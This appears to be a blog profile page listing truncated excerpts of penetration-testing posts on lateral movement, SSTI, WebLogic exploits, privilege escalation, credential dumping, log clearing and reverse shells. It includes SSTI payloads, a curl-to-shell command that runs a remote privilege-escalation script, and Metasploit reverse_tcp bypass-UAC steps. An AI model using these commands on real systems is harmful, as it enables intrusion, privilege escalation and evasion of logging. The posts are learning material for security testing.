自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(56)
  • 收藏
  • 关注

转载 2021-06-14

docker搭建rabbitmq集群https://www.cnblogs.com/vipstone/p/9362388.html

2021-06-14 16:25:32 235

转载 WinRM的横向移动详解

https://mp.weixin.qq.com/s/Y9rGmAnFivcTofOVt0BUmQ

2021-02-23 06:22:06 312

转载 记一次针对SupeSite的中转注入实战

近期在一次演练行动中,对某目标进行了一次渗透测试,期间用到了sqlmap的中转注入技术,还是很有收获的,记录下来和大家共同分享,由于是实战,免不了部分地方是要马赛克的,大家见谅。免责声明:本文中提到的漏洞利用方法和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。手工注入打开网页,拉到最底看到是图片感觉历史有点悠久了,应该是有现成的漏洞了。查阅了一波资料,大佬已经给出了SQL注入的地方,开心的手工注入一波;先看看有多少字段;http://www.xxxxx.com/batch.commo

2021-02-23 05:14:21 445

转载 服务端模板注入漏洞SSTI

所有用户的输入都存在风险tempalte = "Bio:{{user.bio}}"render(template)数据交互Bio(user对象的bio属性)当user.bio是正常输入时,例如:Bio:{{7*7}},那就是正常的显示输入。当user.bio是恶意输出时,例如:Bio:{{exec(‘ls’)}},就会执行系统命令。基于python的flask web架构做一个简单的测试。构造payload{{import os;os.system("id")}}失败了,这是因为J

2021-02-21 18:23:06 394

转载 内网渗透测试:利用DCOM进行横向渗透

图片COMCOM即组件对象模型(Component Object Model,COM) ,是基于 Windows 平台的一套组件对象接口标准,由一组构造规范和组件对象库组成。COM是许多微软产品和技术,如Windows媒体播放器和Windows Server的基础。一般的对象是由数据成员和作用在其上的方法组成,而组件对象和一般对象虽有相似性,但又有较大不同。组件对象不使用方法而用接口来描述自身。接口被定义为“在对象上实现的一组语义上相关的功能”,其实质是一组函数指针表,每个指针必须初始化指向某个具体的

2021-02-21 01:06:57 1556

转载 威胁狩猎:基于ELK的日志监控

威胁狩猎:基于ELK的日志监控0x0 概述ELK Stack即以前的Elastic Stack,Elk Stack是Elastic公司专门为集中化日志管理设计的免费开源软件组合。它允许搜索、分析和可视化来自不同来源的日志。如在ubuntu上安装配置ELK Stack,需要如下先决条件:Ubuntu 20.04最好使用Root 权限进行配置0x1 内容目录ELK Stack 组成部分安装 Java 和所有依赖项安装和配置 Elasticsearch安装和配置 Logstash安装和配置

2021-02-20 21:58:21 200

转载 de1ay靶场实战

文章目录de1ay环境WEB信息收集weblogic 10.3.6WeblogicScanWeblogic-EXP反弹shellProxy代理reGeorg + proxychainsmsf socks代理cs socks代理dump hashmimikatzpowershellprocdumpcs的logonpasswordsLaZagne横向移动-PTHCS-PTH横向移动-PTTms14-068de1ay环境所有机器密码:1qaz@WSXDE1AY\administrator 1qaz@

2021-02-20 21:23:26 1542

转载 Windows域认证机制

文章目录Windows认证机制Windows认证基础本地认证网络认证hashcat破解net-ntlm hash域认证Kerberos认证协议的基础概念Kerbreros认证流程1. 用户登录2. 请求身份认证2.1 客户端向AS(身份认证服务)发送认证请求2.2 AS确认Client端登录者用户身份3. 请求服务授权3.1 客户端向TGS发送请求服务授权请求3.2 TGS为Client响应服务授权票据4.发送服务请求4.1 Client向Service Server发送服务请求4.2 SS响应Client

2021-02-20 21:22:07 2870

转载 Windows防火墙及Linux防火墙

简介WebLogic 是美国 Oracle 公司的主要产品之一,是商业市场上主要的 J2EE 应用服务器软件,也是世界上第一个成功商业化的 J2EE 应用服务器,在 Java 应用服务器中有非常广泛的部署和应用。概述10 月 21 日,Oracle 官方发布数百个组件的高危漏洞公告。其中组合利用 CVE-2020-14882/CVE-2020-14883 可使未经授权的攻击者绕过 WebLogic 后台登录等限制,最终远程执行代码接管 WebLogic 服务器,利用难度极低,风险极大。  此处漏洞均

2021-02-20 20:55:33 850

转载 CVE-2020-14882&14883weblogic未授权命令执行漏洞复现

简介WebLogic 是美国 Oracle 公司的主要产品之一,是商业市场上主要的 J2EE 应用服务器软件,也是世界上第一个成功商业化的 J2EE 应用服务器,在 Java 应用服务器中有非常广泛的部署和应用。概述10 月 21 日,Oracle 官方发布数百个组件的高危漏洞公告。其中组合利用 CVE-2020-14882/CVE-2020-14883 可使未经授权的攻击者绕过 WebLogic 后台登录等限制,最终远程执行代码接管 WebLogic 服务器,利用难度极低,风险极大。  此处漏洞均

2021-02-11 23:03:15 593

转载 docker下运行漏洞环境

建立一个漏洞复现的环境,其实和建立一个应用的步骤是类似的。只是漏洞复现环境是存在漏洞的应用而已。对环境的搭建比较方便的方式是通过dockerfile结合docker-compose。Dockerfile是由一系列命令和参数构成的脚本,这些命令应用于拉取的基础镜像并最终创建一个新的镜像,通过Dockerfile我们可以创建一个你需要的镜像,里面是包含了你要安装的软件,相当于是提前定制好要安装的拓展,执行的命令等,然后一键执行,极大地简化操作流程。Dockerfile由4部分组成:基础镜像信息、维护者信息、

2021-02-11 22:38:31 353

转载 Java 反序列化 - commons collection 之困(一)

01多余的碎碎念说到 java 反序列化,去搜索的话能看到网上有很多分析关于 commons collection 利用链的文章,emm 我一开始看不懂,看到很多代码的图头晕。这篇文章的话其实是我跟着 p 神的文章一路走下来的,所以整个逻辑会按照 p 神的文章走。那对于反射、动态代理也有一些自己的理解,所以就记录下来。希望也给你们多一个角度的理解。02反射为什么要先讲反射?因为你去看他的利用链的实现,会发现都会运用到反射。java 中有两个类用来执行命令,一个是 Runtime ,一个是 Proc

2021-02-11 22:03:50 173

转载 中间人攻击之ARP欺骗

0x00、软件安装及环境搭建第一步、Kali下载导入Kali下载地址(VMware版本):https://images.kali.org/virtual-images/kali-linux-2020.4-vmware-amd64.7z解压后,打开VMware,图片.png图片.png第二步、Dsniff套件安装Dsniff是一个基于unix系统网络嗅探工具。Dsniff是一个工具集,主要分为四类:1、纯粹被动地进行网络活动监视的工具,包括:dsniff、filesnarf、mailsna

2021-02-11 21:37:20 379

原创 痕迹清除

在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录,执行命令等。攻击者通常会对Windows日志进行清除和绕过。windows痕迹清除如何查看:事件查看器 -> windows日志win+r eventvwr.msc保存路径:C:\Windows\System32\winevt\Logs\包括五个类别:应用程序、安全、Setup、系统、转发事件powershell -c “Get-WinEvent -FilterHashtable @{lognam

2021-02-10 18:07:19 626

原创 windows外部工具横向移动

01. PsexecPsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。下载地址:https://docs.microsoft.com/zhcn/sysinternals/downloads/psexec原理:建立IPC连接,使用Psexec无需输入密码第一次运行会弹框,加 -accepteula 参数可绕过-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)-d 不

2021-02-10 18:01:19 459

原创 windows内置工具横向移动

01. IPC+SchtasksIPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。利用条件开放了139、445端口;目标开启IPC$文件共享服务需要目标机器的管理员账号和密码连接net use \10.10.10.201\ipc$ /user:administrator “1qaz@

2021-02-10 17:54:02 489

转载 数据库提权

01. Mysql提权Mysql提权一user defined function,用户定义函数,为用户提供了一种高效创建函数的方式攻击者编写调用系统cmd命令(linux下相当于调用shell命令)的udf.dll文件,并将udf.dll导出到指定目录下,攻击者创建一个指向udf.dll的自定义函数func,每次在数据库查询中执行func函数等价于在cmd命令中执行命令。Windows2003:C:\windowsMySQL 5.1版本后:mysql安装目录\lib\plugin\目录下在MySQ

2021-02-10 17:41:23 898

转载 linux提权靶场详解

linux提权靶场详解文章目录linux提权靶场详解下载与安装1.sudo提权2./etc/passwd哈希/etc/passwd/etc/shadow提权3.crontab定时任务4.敏感隐藏文件5.suid提权xxd访问/etc/shadowtaskset执行bash6.NFS服务低权限访问nfs挂载写入ssh公钥7.docker组提权8.systemd配置提权systemd提权下载与安装#下载链接https://www.vulnhub.com/entry/linsecurity-1,244/

2021-02-10 17:32:15 2281 3

原创 linux提权

gcc编译exp要使用相对应版本的机器,然后再上传sudo /bin/bashvim /etc/netplan/50修改ens33netplan apply修改键盘vim /etc/default/keybcurl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh01操作系统信息➢ 查看发行版本cat

2021-02-10 17:30:28 414

原创 渗透测试框架提权

01 Metasploit提权模块➢ Meterpreter自动提权命令getsystemgetuid➢ 提权命令执行失败,绕过uacuse exploit/windows/local/bypassuacset payload windows/meterpreter/reverse_tcpset LHOST=192.168.1.170set session 1exploituse exploit/windows/local/bypassuac_injectionset payloa

2021-02-10 17:24:08 153

转载 windows提权

windows-kernel-exploits(Windows平台提权漏洞集合):https://github.com/SecWiki/windows-kernel-exploitsWMIC信息收集WMIC:Windows管理工具命令行,提供了从命令行接口和批命令脚本执行系统管理的支持,对于信息收集和渗透测试是非常实用的。wmic信息提取脚本:wmic_info.bat提取进程、服务、用户帐号、用户组、网络接口、硬盘信息、网络共享信息、安装Windows补丁、程序在启动运行、安装的软件列表、操

2021-02-10 17:16:54 319

转载 socks代理实战

文章目录Socks代理实战Socks代理简介Socks代理工具Socks代理实战-MSF渗透场景Target1Target2Target3Socks代理实战-FRPTarget1Target2Target3Socks代理实战-EWEW使用简介EW正反向Socks代理EW创建一层Socks代理二级级联本地SocksEW创建二层Socks代理三级级联的本地SocksEW创建三层Socks代理Socks代理实战Socks代理简介什么是socksSOCKS是一种网络传输协议,主要用于客户端与外网服务器之

2021-02-08 18:31:37 12441

原创 Linux反弹Shell方法

文章目录Linux反弹Shell方法Linux标准文件描述符更改标准输出的位置更改标准输入的位置/dev/null重定向输入重定向输出重定向管道反弹shell的本质什么是反弹shell实现控制端和被控端之间的交互反弹shell方法NCBashPerlPythonPHPRubyTelnetOpenSSLReferLinux反弹Shell方法Linux标准文件描述符Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符。

2021-02-08 18:23:59 1519

原创 内网文件传输

windows01 FTP攻击机:python快速开启ftp服务器pip3 install pyftpdlibPython3 -m pyftpdlib目标机:copy con ftp.txtopen 192.168.78.70 2121anonymousanonymousget pass.txtquit02 BitsadminBITSAdmin是一个命令行工具,您可以使用它创建下载或上载作业,并监视其进度。msfvenom -p windows/x64/meterpreter

2021-02-08 18:22:07 638

原创 linux主机信息收集

uname -a打印系统信息cat /etc/issue文件/etc/issue是一个文本文件,其中包含要在登录提示之前打印的消息或系统标识。cat /etc/*-release/etc/lsb-release, /etc/redhat-release 文件包含一个被解析以获取信息的描述行。cat /proc/version/proc/version指定了Linux内核的版本,用于编译内核的gcc的版本以及内核编译的时间。 它还包含内核编译器的用户名。cat /proc/sys/ke

2021-02-08 18:12:45 317

原创 windows 域内密码凭证获取

windows\NTDS\ntds.ditwindows\system32\config\systemwindows\system32\config\securityntds.dit:活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解工作组sam文件与ntds.dit文件都需要拥有一个system文件AD DS数据存储:• 由 ntds.dit 文件构成• 默

2021-02-08 18:11:54 844

原创 查看域内RDP连接记录获取密码

https://github.com/3gstudent/List-RDP-Connections-History.gitpowershell -exec bypass ./ListAllUser.ps1本地RDP连接密码解密• Mimikatz查看本地机器本地连接过的目标机器:reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /s查看本地用户此目录下是否存有RDP密码文件:dir /

2021-02-08 18:09:57 1332

原创 windows 密码凭证获取

MimikatzPowershell脚本WCEPwddump7OphcrackProcdump+Mimikatz注册表导出HashLaZagneMeterpreter获取HashCobaltstrile获取HashWindows系统下hash密码格式:用户名称:RID:LM-HASH值:NT-HASH值记住后半段的NTLMwindows本地认证流程:用户输入密码系统收到密码后将用户输入的密码计算成NTLM Hash与sam数据库(%SystemRoot%\system.

2021-02-08 18:09:24 1143

原创 cs与msf联动概述

cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。获得beacon shell,启动socksshell ipconfig 目标机器在24.*网段,仅一个网段思路:利用 beacon shell 在目标机器和团队服务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。查看团队服务器 socks 端口启起来了没有:netst

2021-02-08 18:05:34 2411

原创 cobalt strike

cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。metasploit是一款开源框架,armitage是metasploit框架的图形化界面方式,cobalt strike是armitage

2021-02-08 17:57:22 14941

原创 metasploit介绍及使用

The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。目录kali-metasploit框架目录路径:/opt/metasploit-framework/embedded/framework//usr/share

2021-02-07 00:08:23 28269 1

原创 弱口令密码破解(应用)

➢ HydraHydra是一款开源的暴力破解工具,支持FTP、MSSQL、MySQL、PoP3、SSH等暴力破解➢参数介绍hydra –l root –p root 172.26.2.36 ssh-l 指定用户名-L 指定用户名字典-p 指定密码-P 指定密码字典-C 使用冒号分隔,比如root:root-M 指定目标列表文件-f 在找到第一对登录名或密码的时候停止➢ SNETCrackerSNETCracker 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多

2021-02-06 23:54:41 3268

原创 弱口令及暴力破解(后台)

➢弱口令弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令。➢示例简单数字组合: 000000 111111 11111111 112233 123123顺序字符组合:abcdef abcabc abc123 a1b2c3 aaa111临近字符组合:123qwe Qwerty qweasd特殊含义组合:admin password p@ssword passwd Il

2021-02-06 23:50:50 6952 2

原创 shiro漏洞

➢ Shiro概述Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。➢ Shiro历史漏洞( Shiro- - 550)Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。➢ Shiro历史漏洞( Shiro-

2021-02-06 23:42:40 3460

原创 Fastjson漏洞

➢ Fastjson概述Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到JavaBean。➢历史漏洞Fastjson <=1.2.24 反序列化远程命令执行漏洞Fastjson <=1.2.41 反序列化远程命令执行漏洞Fastjson <=1.2.42 反序列化远程命令执行漏洞Fastjson <=1.2.43 反序列化远程命令执行漏洞

2021-02-06 23:33:05 5165

原创 Thinkphp漏洞

➢ Thinkphp介绍ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持windows/Unix/Linux等服务器环境。➢ Thinkphp应用很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。➢历史漏洞ThinkPHP3.2.3_缓存函数设计缺陷可导致GetshellThinkPHP5_SQL注入漏洞&&敏感信息泄露ThinkPHP3.2.3_最新版update注入漏洞Thin

2021-02-06 23:28:08 982 1

原创 springboot漏洞

➢ Spring介绍Spring 是java web里非常常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化➢ Actuators介绍Spring Boot 基本上是 Spring 框架的扩展。Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默

2021-02-06 23:25:08 7128

原创 Weblogic相关漏洞

➢ Weblogic介绍WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。➢ Weblogic特征✓ 端口:7001✓ Web界面:Error 404–Not Found➢历史漏洞#控制台路径泄露Weakpassword#SSRF:CVE-2014-4210#任意文件上传CVE-2018-2894

2021-02-06 23:21:00 755

原创 Jboss漏洞

➢ Jboss概述一个基于J2EE的开放源代码的应用服务器。JBoss是一个管理EJB的容器和服务器,但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。Jboss是Java EE应用服务器(就像Apache是web服务器一样),专门用来运行Java EE程序的。➢ Jboss历史漏洞(访问控制不严导致的漏洞)JMX Console未授权访问GetshellJMX Console HtmlAdaptor Getshell(CVE-2007-

2021-02-05 19:20:08 333

原创 Struts2识别与漏洞利用

Struts2框架识别 (1)通过网页后缀来进行判断,如.do或者.action➢ Struts2漏洞验证➢ Struts2- - 045漏洞介绍安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞;(漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高风险,影响版本范围为Struts 2.3.5 – Struts 2.3.31和Struts 2.5 – Struts 2.5.10。➢ St

2021-02-05 19:17:42 2373

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除